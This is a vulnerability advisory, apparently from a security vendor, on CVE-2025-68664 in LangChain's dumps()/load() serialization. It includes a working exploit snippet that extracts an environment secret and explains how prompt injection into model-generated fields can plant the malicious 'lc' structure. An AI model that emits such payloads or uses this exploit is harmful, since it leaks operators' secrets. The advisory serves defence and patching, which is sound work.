Executive Summary

CVE-2025-68664 is a critical serialization injection vulnerability in LangChain that affects how data is serialized using dumps() and dumpd(), and later reconstructed using load() and loads().

The issue stems from a failure to properly escape user-controlled dictionaries that contain the reserved lc key. Because this key is used internally by LangChain to represent serialized objects, unescaped user data may later be interpreted as a valid LangChain object during deserialization.

When this happens, attacker-controlled data can be treated as executable object metadata rather than plain values. In vulnerable configurations, this can lead to secret extraction from environment variables or instantiation of internal classes with attacker-defined parameters.

What Is LangChain?

LangChain is a widely used framework for building LLM-powered applications. It provides abstractions for:

  • Streaming model outputs
  • Managing execution graphs and chains
  • Persisting message history
  • Caching generations and intermediate results
  • Moving structured data between tools, agents, and retrievers

To support these workflows, LangChain relies heavily on serialization. Data is frequently converted into a structured form, stored or transmitted, and later reconstructed using the framework’s deserialization APIs.
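
As a minimal illustration of this round trip, the following sketch serializes and reconstructs a Document using the public load APIs (the field values are arbitrary examples):

from langchain_core.documents import Document
from langchain_core.load import dumpd, load

# Serialize a framework object into a plain dict manifest...
doc = Document(page_content="hello", metadata={"source": "example"})
manifest = dumpd(doc)

# ...then reconstruct it from that manifest, as a store or cache would.
restored = load(manifest)
assert restored.page_content == "hello"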

Affected Versions

The vulnerability affects multiple release tracks of LangChain Core.

Vulnerable versions:

  • langchain-core >= 1.0.0 and < 1.2.5
  • langchain-core < 0.3.81

Patched versions:

  • langchain-core 1.2.5
  • langchain-core 0.3.81

Applications running affected versions should assume the vulnerable serialization behavior is present unless explicitly mitigated.
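
To check which release a deployment is running, the installed version can be read directly (a small sketch using importlib.metadata):

from importlib.metadata import version

# Prints the installed release; compare against the ranges above.
print(version("langchain-core"))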

Root Cause: Unescaped lc Keys During Serialization

LangChain’s serialization format reserves the lc key to indicate internal serialized objects.

The vulnerability arises because dumps() and dumpd() did not escape dictionaries containing an lc key. These dictionaries could originate from user-controlled or LLM-generated data, and the resulting serialized output retained the lc structure unmodified.

When that output was later passed into load() or loads(), the deserializer treated the injected structure as a legitimate LangChain object instead of ordinary user data.

In effect, data that should have remained inert was reinterpreted as an instruction.
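
This asymmetry is easy to observe. In the sketch below (the field values are illustrative), a vulnerable dumps() emits the nested lc structure verbatim:

from langchain_core.load import dumps

# A user-supplied dict that happens to contain the reserved "lc" key.
user_data = {"comment": {"lc": 1, "type": "secret", "id": ["API_KEY"]}}

# On vulnerable versions the nested structure is emitted verbatim,
# indistinguishable from a manifest the framework produced itself.
print(dumps(user_data))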

How load() and loads() Interpret the Injected Data

The deserialization APIs (load() and loads()) reconstruct objects based on serialized manifests.

If an attacker-controlled payload includes a structure like:

{
  "lc": 1,
  "type": "secret",
  "id": ["API_KEY"]
}

then, in vulnerable versions:

  • The structure is parsed as a serialized LangChain object
  • Environment variables may be accessed during reconstruction
  • The resulting value is returned as part of the application’s data

Earlier versions further amplified the risk by defaulting to secrets_from_env=True, allowing environment variables to be read automatically during deserialization.
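
Until an upgrade is possible, secret resolution can be disabled explicitly. The sketch below uses a hypothetical placeholder payload; exact behavior for unresolved references varies by release:

from langchain_core.load import loads

# Placeholder payload carrying an injected secret reference.
untrusted_payload = '{"lc": 1, "type": "secret", "id": ["API_KEY"]}'

# With resolution disabled the environment is never consulted; depending
# on the release, the unresolved reference surfaces as an error or an
# inert value instead of a leaked secret.
try:
    print(loads(untrusted_payload, secrets_from_env=False))
except KeyError as exc:
    print(f"secret reference not resolved: {exc}")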

Reachable Attack Surface

This vulnerability is not limited to cases where applications explicitly deserialize untrusted external input.
In many LangChain workflows, serialization and deserialization are performed internally as part of normal framework behavior.

The vulnerable dumps() → load() flow is reachable through several commonly used features:

  • astream_events(version="v1"): The v1 streaming implementation serializes event payloads using the affected serialization logic.
  • Runnable.astream_log(): Streaming logs rely on internal serialization of execution state that may include LLM-controlled fields.
  • Message history handling via RunnableWithMessageHistory: Conversation state is serialized and later reconstructed, potentially reloading attacker-influenced data.
  • Reloading cached generations: Cached LLM outputs may be deserialized at a later stage, reprocessing data that originated from model responses.
  • InMemoryVectorStore.load() on untrusted documents: Loading vector stores reconstructs serialized documents that may contain attacker-controlled metadata.
  • Loading artifacts from the LangChain Hub using hub.pull: Pulled manifests are deserialized locally and may include injected structures if the source is not trusted.
  • Byte-store–backed retrievers and document stores: Byte stores persist serialized representations that are later reloaded during retrieval operations.
  • LangSmith run loaders processing untrusted messages: Run data containing LLM-generated content may be deserialized as part of analysis or replay workflows.

In many of these cases, developers do not directly call load() or loads(), making it easy to overlook that untrusted data is being deserialized at all.
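
For example, even a trivial chain exercises the v1 event stream, which serializes event payloads behind the scenes (a minimal sketch; the chain itself is arbitrary):

import asyncio
from langchain_core.runnables import RunnableLambda

# An arbitrary minimal chain; the application never calls dumps() or
# load() itself.
chain = RunnableLambda(lambda x: {"echo": x})

async def main():
    # Each streamed event passes through the internal serializer.
    async for event in chain.astream_events({"input": "hi"}, version="v1"):
        print(event["event"])

asyncio.run(main())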

Most Common Injection Vector

The most common entry point for attacker-controlled data is through LLM-generated fields, such as:

  • additional_kwargs
  • response_metadata
  • Tool outputs
  • Prompt-influenced structured responses

Because these fields can be influenced through prompt injection, an attacker may be able to introduce a malicious lc structure without direct access to application code or APIs.
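
The sketch below illustrates how such a payload could travel on a vulnerable version (the message content and the injected key are hypothetical; in practice the structure would come from a prompt-injected model response rather than being constructed by hand):

import os
from langchain_core.load import dumps, loads
from langchain_core.messages import AIMessage

os.environ["API_KEY"] = "key-123"

# A model response whose additional_kwargs smuggles a reserved structure.
msg = AIMessage(
    content="Sure, here you go.",
    additional_kwargs={"injected": {"lc": 1, "type": "secret", "id": ["API_KEY"]}},
)

serialized = dumps(msg)  # the nested "lc" dict survives unescaped

# On reload, the injected dict is revived as a secret lookup.
restored = loads(serialized, secrets_from_env=True)
print(restored.additional_kwargs["injected"])  # "key-123" on vulnerable versions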

Impact

If an attacker can influence data that is serialized with dumps() or dumpd() and later processed by load() or loads(), they may be able to:

  • Extract secrets from environment variables
  • Instantiate internal LangChain classes with controlled parameters
  • Trigger side effects during object initialization, such as:
    • Network requests
    • File operations
    • Resource access

The scope is limited to classes within trusted LangChain namespaces, but the impact depends heavily on which classes are available and how they behave during initialization.

Example Exploit Flow

from langchain_core.load import dumps, loads
import os

# Attacker-controlled data containing a reserved "lc" structure
attacker_dict = {
    "attacker_data": {
        "lc": 1,
        "type": "secret",
        "id": ["API_KEY"]
    }
}

serialized = dumps(attacker_dict)  # 'lc' key is not escaped

os.environ["API_KEY"] = "key-123"

# loads() is the string-input counterpart of load(); the injected
# structure is treated as a serialized secret and resolved from the
# environment
deserialized = loads(serialized, secrets_from_env=True)

print(deserialized["attacker_data"])

Output:

key-123

The secret is extracted during deserialization, without direct access to the environment or configuration.

Security Hardening in the Patch

The patched releases address both the immediate bug and the broader risk.

Changes include:

  • Proper escaping of lc keys during dumps() and dumpd()
  • A new allowed_objects mechanism with a restricted default ("core")
  • secrets_from_env default changed from True to False
  • Blocking of Jinja2 template initialization by default via init_validator

Some of these changes are breaking by design, as they tighten previously permissive behavior.
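
After upgrading, the corrected behavior can be sanity-checked with a round trip. This is a sketch that assumes the patched escaping lets plain dicts survive unchanged; the exact escaped wire format is an internal detail:

from langchain_core.load import dumps, loads

payload = {"data": {"lc": 1, "type": "secret", "id": ["API_KEY"]}}

# With escaping in place, the reserved key is neutralized on the way out
# and restored on the way in, so the dict comes back as inert data.
assert loads(dumps(payload)) == payload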

How to Mitigate This Issue

Applying the patched LangChain release is the baseline fix. The update corrects how dumps() and dumpd() handle reserved keys and tightens how load() and loads() reconstruct objects. In many deployments, upgrading alone resolves the issue.

Additional precautions depend on how your application uses serialization:

  • Stick with restrictive deserialization defaults
    If your application only reconstructs built-in LangChain types such as messages or documents, the default deserialization behavior should remain sufficient and requires no extra configuration.
result = load(serialized_payload)

  • Limit which custom objects can be reconstructed
    When deserializing application-specific objects, explicitly declare which classes are expected. Avoid broad or implicit object reconstruction.
result = load(serialized_payload, allowed_objects=[MyAppObject])

  • Keep secret resolution turned off unless necessary
    Resolving environment variables during deserialization should not be enabled by default. Only opt in when the serialized data source is fully trusted and cannot be influenced by user or model input.
result = load(serialized_payload, secrets_from_env=True)

  • Do not bypass initialization checks unless required
    Template-based initialization is blocked by default due to its ability to execute code. Re-enabling it should be limited to tightly controlled scenarios.
result = load(
    serialized_payload,
    allowed_objects=[SafeTemplate],
    init_validator=None
)

Serialization is not just a data format concern in LLM-based systems. When serialized state can be influenced by model output, deserialization behavior becomes part of the security model and should be handled accordingly.

How Upwind Helps Mitigate This Risk

Addressing CVE-2025-68664 starts with upgrading LangChain, but the real risk depends on how affected services behave at runtime. Vulnerabilities in serialization become critical when LLM-driven workloads have access to secrets, filesystems, or external networks.

Upwind helps teams understand that runtime context by identifying where vulnerable LangChain services are running, what sensitive resources they can access, and how far an attacker could move if one of those services is compromised. By mapping real execution paths rather than relying only on configuration or dependency data, Upwind helps security teams assess the actual blast radius of serialization issues like this and prioritize mitigation accordingly.